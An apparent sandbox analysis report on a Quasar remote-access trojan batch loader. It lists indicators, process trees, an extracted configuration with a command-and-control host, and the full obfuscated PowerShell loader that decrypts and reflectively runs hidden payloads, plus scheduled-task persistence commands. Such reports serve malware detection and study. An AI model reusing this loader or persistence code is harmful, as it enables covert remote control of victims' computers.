quasar | 69d3f18cd40fe951e863d6f7cb34f623ae1f169a030c166efd713630744b14da

Analysis

max time kernel
299s
max time network
298s
platform
windows10-1703_x64
resource
win10-20240404-en
resource tags

arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
submitted
12-05-2024 15:08

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Client-built.bat
Size

1.9MB
MD5

ca98faeecf7f69f417e6b8e706986b2e
SHA1

2ed0d04b476658f57e50b86dba53cdc0edb379e8
SHA256

69d3f18cd40fe951e863d6f7cb34f623ae1f169a030c166efd713630744b14da
SHA512

ad3a6e51492f68bf623b08d01d8d9cc9bc58a6496e04c734ddacd2be120987f56ff228bf24f92a67aff408d801a670cfbb83564907219523776b7a8263b41d64
SSDEEP

24576:DqPPl9YNqSrDNfqgg4edWKa1tpD0jH3F8DbFkBNKUXuiFgZULkB4VmVc0i6MwGxb:W1cqzx/WOrBSkQJ8b

Score

10^/10

quasar new execution spyware trojan

Malware Config

Extracted

Family

quasar

Version

1.0.0

Botnet

New

even-lemon.gl.at.ply.gg:33587

Mutex

2bce5514-d527-4787-825c-3042f9dd5ede

Attributes

encryption_key
501DB7A849356BF2C272A70D53FAF39F17D4245C
install_name
WinHost32.exe
log_directory
UpdateLogs
reconnect_delay
3000
startup_key
Powershell
subdirectory
System32

Signatures

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar

Quasar payload 1 IoCs

Processes:

resource	yara_rule
behavioral1/memory/2844-257-0x000001FED6A80000-0x000001FED6D9E000-memory.dmp	family_quasar

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exe

pid process

4512 powershell.exe
3568 powershell.exe
2844 powershell.exe
Executes dropped EXE 1 IoCs

Processes:

WinHost32.exe

pid process

2840 WinHost32.exe

pid	process
2840	WinHost32.exe

Drops file in System32 directory 12 IoCs

Processes:

svchost.exesvchost.exesvchost.exe

description	ioc	process
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6D1A73D92C4DC2751A4B5A2404E1BDCC	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_6372E0472AFF76BB926C97818BC773B9	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_363582827213C09529A76F35FB615187	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Powershell	svchost.exe
File opened for modification	C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Storage-Storport%4Operational.evtx	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\9C237ECACBCB4101A3BE740DF0E53F83	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A	svchost.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exe

pid process

1044 schtasks.exe
Modifies data under HKEY_USERS 1 IoCs

Processes:

svchost.exe

description ioc process

Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections svchost.exe
Modifies registry class 1 IoCs

Processes:

powershell.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings powershell.exe

pid	process
1044	schtasks.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\windows\CurrentVersion\Internet Settings\Connections	svchost.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-1739856679-3467441365-73334005-1000_Classes\Local Settings	powershell.exe

Suspicious behavior: EnumeratesProcesses 35 IoCs

Processes:

powershell.exepowershell.exepowershell.exeWinHost32.exe

pid	process
4512	powershell.exe
4512	powershell.exe
4512	powershell.exe
3568	powershell.exe
3568	powershell.exe
3568	powershell.exe
2844	powershell.exe
2844	powershell.exe
2844	powershell.exe
2844	powershell.exe
2844	powershell.exe
2844	powershell.exe
2844	powershell.exe
2844	powershell.exe
2844	powershell.exe
2844	powershell.exe
2844	powershell.exe
2844	powershell.exe
2844	powershell.exe
2844	powershell.exe
2844	powershell.exe
2844	powershell.exe
2844	powershell.exe
2844	powershell.exe
2844	powershell.exe
2844	powershell.exe
2844	powershell.exe
2844	powershell.exe
2844	powershell.exe
2844	powershell.exe
2844	powershell.exe
2844	powershell.exe
2840	WinHost32.exe
2840	WinHost32.exe
2840	WinHost32.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

Explorer.EXE

pid process

3348 Explorer.EXE

pid	process
3348	Explorer.EXE

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	4512	powershell.exe
Token: SeDebugPrivilege	3568	powershell.exe
Token: SeIncreaseQuotaPrivilege	3568	powershell.exe
Token: SeSecurityPrivilege	3568	powershell.exe
Token: SeTakeOwnershipPrivilege	3568	powershell.exe
Token: SeLoadDriverPrivilege	3568	powershell.exe
Token: SeSystemProfilePrivilege	3568	powershell.exe
Token: SeSystemtimePrivilege	3568	powershell.exe
Token: SeProfSingleProcessPrivilege	3568	powershell.exe
Token: SeIncBasePriorityPrivilege	3568	powershell.exe
Token: SeCreatePagefilePrivilege	3568	powershell.exe
Token: SeBackupPrivilege	3568	powershell.exe
Token: SeRestorePrivilege	3568	powershell.exe
Token: SeShutdownPrivilege	3568	powershell.exe
Token: SeDebugPrivilege	3568	powershell.exe
Token: SeSystemEnvironmentPrivilege	3568	powershell.exe
Token: SeRemoteShutdownPrivilege	3568	powershell.exe
Token: SeUndockPrivilege	3568	powershell.exe
Token: SeManageVolumePrivilege	3568	powershell.exe
Token: 33	3568	powershell.exe
Token: 34	3568	powershell.exe
Token: 35	3568	powershell.exe
Token: 36	3568	powershell.exe
Token: SeIncreaseQuotaPrivilege	3568	powershell.exe
Token: SeSecurityPrivilege	3568	powershell.exe
Token: SeTakeOwnershipPrivilege	3568	powershell.exe
Token: SeLoadDriverPrivilege	3568	powershell.exe
Token: SeSystemProfilePrivilege	3568	powershell.exe
Token: SeSystemtimePrivilege	3568	powershell.exe
Token: SeProfSingleProcessPrivilege	3568	powershell.exe
Token: SeIncBasePriorityPrivilege	3568	powershell.exe
Token: SeCreatePagefilePrivilege	3568	powershell.exe
Token: SeBackupPrivilege	3568	powershell.exe
Token: SeRestorePrivilege	3568	powershell.exe
Token: SeShutdownPrivilege	3568	powershell.exe
Token: SeDebugPrivilege	3568	powershell.exe
Token: SeSystemEnvironmentPrivilege	3568	powershell.exe
Token: SeRemoteShutdownPrivilege	3568	powershell.exe
Token: SeUndockPrivilege	3568	powershell.exe
Token: SeManageVolumePrivilege	3568	powershell.exe
Token: 33	3568	powershell.exe
Token: 34	3568	powershell.exe
Token: 35	3568	powershell.exe
Token: 36	3568	powershell.exe
Token: SeIncreaseQuotaPrivilege	3568	powershell.exe
Token: SeSecurityPrivilege	3568	powershell.exe
Token: SeTakeOwnershipPrivilege	3568	powershell.exe
Token: SeLoadDriverPrivilege	3568	powershell.exe
Token: SeSystemProfilePrivilege	3568	powershell.exe
Token: SeSystemtimePrivilege	3568	powershell.exe
Token: SeProfSingleProcessPrivilege	3568	powershell.exe
Token: SeIncBasePriorityPrivilege	3568	powershell.exe
Token: SeCreatePagefilePrivilege	3568	powershell.exe
Token: SeBackupPrivilege	3568	powershell.exe
Token: SeRestorePrivilege	3568	powershell.exe
Token: SeShutdownPrivilege	3568	powershell.exe
Token: SeDebugPrivilege	3568	powershell.exe
Token: SeSystemEnvironmentPrivilege	3568	powershell.exe
Token: SeRemoteShutdownPrivilege	3568	powershell.exe
Token: SeUndockPrivilege	3568	powershell.exe
Token: SeManageVolumePrivilege	3568	powershell.exe
Token: 33	3568	powershell.exe
Token: 34	3568	powershell.exe
Token: 35	3568	powershell.exe

Suspicious use of WriteProcessMemory 60 IoCs

Processes:

cmd.exepowershell.exeWScript.execmd.exepowershell.exe

description	pid	process	target process
PID 4760 wrote to memory of 2400	4760	cmd.exe	cmd.exe
PID 4760 wrote to memory of 2400	4760	cmd.exe	cmd.exe
PID 4760 wrote to memory of 4512	4760	cmd.exe	powershell.exe
PID 4760 wrote to memory of 4512	4760	cmd.exe	powershell.exe
PID 4512 wrote to memory of 3568	4512	powershell.exe	powershell.exe
PID 4512 wrote to memory of 3568	4512	powershell.exe	powershell.exe
PID 4512 wrote to memory of 1460	4512	powershell.exe	WScript.exe
PID 4512 wrote to memory of 1460	4512	powershell.exe	WScript.exe
PID 1460 wrote to memory of 3712	1460	WScript.exe	cmd.exe
PID 1460 wrote to memory of 3712	1460	WScript.exe	cmd.exe
PID 3712 wrote to memory of 548	3712	cmd.exe	cmd.exe
PID 3712 wrote to memory of 548	3712	cmd.exe	cmd.exe
PID 3712 wrote to memory of 2844	3712	cmd.exe	powershell.exe
PID 3712 wrote to memory of 2844	3712	cmd.exe	powershell.exe
PID 2844 wrote to memory of 3348	2844	powershell.exe	Explorer.EXE
PID 2844 wrote to memory of 2756	2844	powershell.exe	svchost.exe
PID 2844 wrote to memory of 2556	2844	powershell.exe	svchost.exe
PID 2844 wrote to memory of 2748	2844	powershell.exe	svchost.exe
PID 2844 wrote to memory of 1164	2844	powershell.exe	svchost.exe
PID 2844 wrote to memory of 2540	2844	powershell.exe	svchost.exe
PID 2844 wrote to memory of 2728	2844	powershell.exe	svchost.exe
PID 2844 wrote to memory of 2136	2844	powershell.exe	svchost.exe
PID 2844 wrote to memory of 756	2844	powershell.exe	svchost.exe
PID 2844 wrote to memory of 1540	2844	powershell.exe	svchost.exe
PID 2844 wrote to memory of 2512	2844	powershell.exe	svchost.exe
PID 2844 wrote to memory of 4872	2844	powershell.exe	svchost.exe
PID 2844 wrote to memory of 1320	2844	powershell.exe	svchost.exe
PID 2844 wrote to memory of 1800	2844	powershell.exe	svchost.exe
PID 2844 wrote to memory of 1120	2844	powershell.exe	svchost.exe
PID 2844 wrote to memory of 920	2844	powershell.exe	svchost.exe
PID 2844 wrote to memory of 1500	2844	powershell.exe	svchost.exe
PID 2844 wrote to memory of 1892	2844	powershell.exe	svchost.exe
PID 2844 wrote to memory of 2676	2844	powershell.exe	svchost.exe
PID 2844 wrote to memory of 896	2844	powershell.exe	svchost.exe
PID 2844 wrote to memory of 1680	2844	powershell.exe	svchost.exe
PID 2844 wrote to memory of 2268	2844	powershell.exe	svchost.exe
PID 2844 wrote to memory of 1300	2844	powershell.exe	svchost.exe
PID 2844 wrote to memory of 1080	2844	powershell.exe	svchost.exe
PID 2844 wrote to memory of 2852	2844	powershell.exe	svchost.exe
PID 2844 wrote to memory of 880	2844	powershell.exe	svchost.exe
PID 2844 wrote to memory of 1396	2844	powershell.exe	svchost.exe
PID 2844 wrote to memory of 1072	2844	powershell.exe	svchost.exe
PID 2844 wrote to memory of 1656	2844	powershell.exe	svchost.exe
PID 2844 wrote to memory of 1848	2844	powershell.exe	svchost.exe
PID 2844 wrote to memory of 1444	2844	powershell.exe	svchost.exe
PID 2844 wrote to memory of 1836	2844	powershell.exe	svchost.exe
PID 2844 wrote to memory of 3200	2844	powershell.exe	svchost.exe
PID 2844 wrote to memory of 1224	2844	powershell.exe	svchost.exe
PID 2844 wrote to memory of 828	2844	powershell.exe	svchost.exe
PID 2844 wrote to memory of 1812	2844	powershell.exe	svchost.exe
PID 2844 wrote to memory of 1612	2844	powershell.exe	svchost.exe
PID 2844 wrote to memory of 612	2844	powershell.exe	svchost.exe
PID 2844 wrote to memory of 1476	2844	powershell.exe	svchost.exe
PID 2844 wrote to memory of 2176	2844	powershell.exe	svchost.exe
PID 2844 wrote to memory of 1584	2844	powershell.exe	svchost.exe
PID 2844 wrote to memory of 396	2844	powershell.exe	svchost.exe
PID 2844 wrote to memory of 1044	2844	powershell.exe	schtasks.exe
PID 2844 wrote to memory of 1044	2844	powershell.exe	schtasks.exe
PID 2844 wrote to memory of 2840	2844	powershell.exe	WinHost32.exe
PID 2844 wrote to memory of 2840	2844	powershell.exe	WinHost32.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay
1⤵
PID:756

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch
1⤵
PID:828

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k rpcss
1⤵
PID:880

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s LSM
1⤵
PID:920

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
1⤵
PID:396

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts
1⤵
PID:612

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService
1⤵
PID:896

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork
1⤵
PID:1072

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Schedule
1⤵
- Drops file in System32 directory
PID:1080

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog
1⤵
- Drops file in System32 directory
PID:1120

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
1⤵
PID:1164

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s nsi
1⤵
PID:1224

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Themes
1⤵
PID:1300

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s EventSystem
1⤵
PID:1320

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s UserManager
1⤵
PID:1396

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s Dhcp
1⤵
PID:1444

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s SENS
1⤵
PID:1476

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s AudioEndpointBuilder
1⤵
PID:1540

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s NlaSvc
1⤵
PID:1584

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s Dnscache
1⤵
PID:1612

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
1⤵
PID:1680

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
1⤵
PID:1800

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted
1⤵
PID:1812

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s netprofm
1⤵
PID:1836

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k appmodel -s StateRepository
1⤵
PID:1848

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
1⤵
PID:1892

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s LanmanWorkstation
1⤵
PID:1656

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
1⤵
PID:2136

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k appmodel -s tiledatamodelsvc
1⤵
PID:2268

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
1⤵
PID:2512

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
1⤵
PID:2540

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservicenetworkrestricted -s PolicyAgent
1⤵
PID:2556

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Browser
1⤵
PID:2676

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s CryptSvc
1⤵
- Drops file in System32 directory
PID:2728

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s TrkWks
1⤵
PID:2748

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s WpnService
1⤵
PID:2756

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc
1⤵
PID:2852

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s TokenBroker
1⤵
PID:3200

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious behavior: GetForegroundWindowSpam
PID:3348

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Client-built.bat"
2⤵
- Suspicious use of WriteProcessMemory
PID:4760

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('LfcFzG8RsgFQuzCbge5AZWKnjDyvcb7J2DMyfnjW+WE='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('t0LkWuaxKmd71m5FdnY80w=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vGXxC=New-Object System.IO.MemoryStream(,$param_var); $MJyez=New-Object System.IO.MemoryStream; $GEiaV=New-Object System.IO.Compression.GZipStream($vGXxC, [IO.Compression.CompressionMode]::Decompress); $GEiaV.CopyTo($MJyez); $GEiaV.Dispose(); $vGXxC.Dispose(); $MJyez.Dispose(); $MJyez.ToArray();}function execute_function($param_var,$param2_var){ $wRrOX=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $JYzvg=$wRrOX.EntryPoint; $JYzvg.Invoke($null, $param2_var);}$BMtWH = 'C:\Users\Admin\AppData\Local\Temp\Client-built.bat';$host.UI.RawUI.WindowTitle = $BMtWH;$VjJUr=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($BMtWH).Split([Environment]::NewLine);foreach ($buUQD in $VjJUr) { if ($buUQD.StartsWith('ZyCIkpbtJnSamEKtqvbb')) { $OKyUT=$buUQD.Substring(20); break; }}$payloads_var=[string[]]$OKyUT.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
3⤵
PID:2400

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
3⤵
- Command and Scripting Interpreter: PowerShell
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4512

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName '$phantom-RuntimeBroker_startup_986_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_986.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3568

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\$phantom-startup_str_986.vbs"
4⤵
- Suspicious use of WriteProcessMemory
PID:1460

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\$phantom-startup_str_986.bat" "
5⤵
- Suspicious use of WriteProcessMemory
PID:3712

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('LfcFzG8RsgFQuzCbge5AZWKnjDyvcb7J2DMyfnjW+WE='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('t0LkWuaxKmd71m5FdnY80w=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $vGXxC=New-Object System.IO.MemoryStream(,$param_var); $MJyez=New-Object System.IO.MemoryStream; $GEiaV=New-Object System.IO.Compression.GZipStream($vGXxC, [IO.Compression.CompressionMode]::Decompress); $GEiaV.CopyTo($MJyez); $GEiaV.Dispose(); $vGXxC.Dispose(); $MJyez.Dispose(); $MJyez.ToArray();}function execute_function($param_var,$param2_var){ $wRrOX=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $JYzvg=$wRrOX.EntryPoint; $JYzvg.Invoke($null, $param2_var);}$BMtWH = 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_986.bat';$host.UI.RawUI.WindowTitle = $BMtWH;$VjJUr=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($BMtWH).Split([Environment]::NewLine);foreach ($buUQD in $VjJUr) { if ($buUQD.StartsWith('ZyCIkpbtJnSamEKtqvbb')) { $OKyUT=$buUQD.Substring(20); break; }}$payloads_var=[string[]]$OKyUT.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
6⤵
PID:548

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
6⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:2844

C:\Windows\SYSTEM32\schtasks.exe
"schtasks" /create /tn "Powershell" /sc ONLOGON /tr "C:\Users\Admin\AppData\Roaming\System32\WinHost32.exe" /rl HIGHEST /f
7⤵
- Creates scheduled task(s)
PID:1044

C:\Users\Admin\AppData\Roaming\System32\WinHost32.exe
"C:\Users\Admin\AppData\Roaming\System32\WinHost32.exe"
7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2840

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s CDPSvc
1⤵
PID:4872

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc
1⤵
- Modifies data under HKEY_USERS
PID:2176

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s wlidsvc
1⤵
PID:1500

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Persistence

Scheduled Task/Job

T1053

Privilege Escalation

Scheduled Task/Job

T1053

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
ad5cd538ca58cb28ede39c108acb5785

SHA1
1ae910026f3dbe90ed025e9e96ead2b5399be877

SHA256
c9e6cb04d6c893458d5a7e12eb575cf97c3172f5e312b1f63a667cbbc5f0c033

SHA512
c066c5d9b276a68fa636647bb29aea05bfa2292217bc77f5324d9c1d93117772ee8277e1f7cff91ec8d6b7c05ca078f929cecfdbb09582522a9067f54740af13

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
2KB

MD5
fcfd483443a168a335b2ac6a4545cbc9

SHA1
e2d1e375d02ed67e4b9deefe2a25bb52b8e2dd5b

SHA256
97fb8b8ff0c5421ed7a8307c60a578de386426cd8f68403c8eaa199f7b3306a5

SHA512
6d44225a5350e111145f83a2e74a86824cab17955f7546faf07ebc0222674a1f0f2d35376ed3be644fb1a397467e3319bb98d26885b073d339d9a28037e405b5

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive

Filesize
2KB

MD5
6b4d3cdb615fd980ee136e8a4d204b9b

SHA1
8018909f07228fd78ec2cfff844b1e5ef55d758c

SHA256
427b3d97157dd6085a4a793f33a580694f0d9203a7719bed7bf1d98a9b3d672d

SHA512
f65bf406cc38a47510423e0aea95b91aed72b8eeafb3d0a13f487f2b77b8b9ff6774fd966329dc61c28b074042c89fbcbf2b353298c36e070f4cc3043c617812

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3txx1xkp.fhs.ps1

Filesize
1B

MD5
c4ca4238a0b923820dcc509a6f75849b

SHA1
356a192b7913b04c54574d18c28d46e6395428ab

SHA256
6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

SHA512
4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

Download Submit
C:\Users\Admin\AppData\Roaming\$phantom-startup_str_986.bat

Filesize
1.9MB

MD5
ca98faeecf7f69f417e6b8e706986b2e

SHA1
2ed0d04b476658f57e50b86dba53cdc0edb379e8

SHA256
69d3f18cd40fe951e863d6f7cb34f623ae1f169a030c166efd713630744b14da

SHA512
ad3a6e51492f68bf623b08d01d8d9cc9bc58a6496e04c734ddacd2be120987f56ff228bf24f92a67aff408d801a670cfbb83564907219523776b7a8263b41d64

Download Submit
C:\Users\Admin\AppData\Roaming\$phantom-startup_str_986.vbs

Filesize
124B

MD5
9bdfca7cb8d2c80c7087052e340af01d

SHA1
684c2f5cbda6f99e646ac94855385cfece10e859

SHA256
91d7486ba28365901c8069d0d66541cdaabc33e767d823b93ee2888430671fa1

SHA512
05333b285613b30b83e31f77e8f9cec2151c8c31c12904da3f9dc4c08d4f9abfdd41dda51fd2cbb713dede68d3b99124f3142f2d0496f75b76c4e4e5259d9701

Download Submit
C:\Users\Admin\AppData\Roaming\System32\WinHost32.exe

Filesize
435KB

MD5
f7722b62b4014e0c50adfa9d60cafa1c

SHA1
f31c17e0453f27be85730e316840f11522ddec3e

SHA256
ccc8538dd62f20999717e2bbab58a18973b938968d699154df9233698a899efa

SHA512
7fe6a32f1a69ffdae5edc450a1fcbaed5eac805cb43abd86c5c54de59219f801c71d2a0c816ac182a5bfa568196463a351a86ac8d782423cab1e15648e5af8e4

Download Submit
memory/1080-230-0x00007FFC3A5D0000-0x00007FFC3A5E0000-memory.dmp

Filesize
64KB

Download
memory/1120-227-0x00007FFC3A5D0000-0x00007FFC3A5E0000-memory.dmp

Filesize
64KB

Download
